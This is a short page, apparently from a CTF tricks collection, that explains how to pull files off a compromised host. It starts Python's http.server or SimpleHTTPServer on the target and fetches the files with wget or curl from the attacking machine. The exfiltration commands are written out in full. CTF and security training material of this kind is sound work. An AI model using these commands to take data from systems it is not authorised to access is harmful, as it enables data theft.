> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-10/file-transfer/python-http-server/trick-0341.md).

# Exfiltrate File via Python HTTP Server

***

Use Python's built-in `http.server` module to quickly serve files from the current directory on a compromised host for easy exfiltration.

The module can be used from the command line to start a simple HTTP server. Navigate to the directory you wish to serve on the target system and run:

```bash
python3 -m http.server 4444
```

This starts a simple HTTP server listening on port 4444. The port number is optional and defaults to 8000 if not specified. For older Python 2 systems, the equivalent command using the `SimpleHTTPServer` module is:

```bash
python -m SimpleHTTPServer 8000
```

Once the server is running, you can access the files from your attacking machine using `wget`, `curl`, or a web browser by navigating to `http://<TARGET_IP>:<port>`. For example, to download a specific file located in the served directory:

```bash
wget http://<TARGET_IP>:4444/file_you_want.ext
```

Alternatively, using `curl`:

```bash
curl http://<TARGET_IP>:4444/file_you_want.ext -O file_you_want.ext
```

This technique is particularly useful in post-exploitation scenarios where more direct file transfer methods like `scp` are unavailable or inconvenient. It requires a Python interpreter on the target system (Python3 for the `http.server` module, or Python2 for `SimpleHTTPServer`).
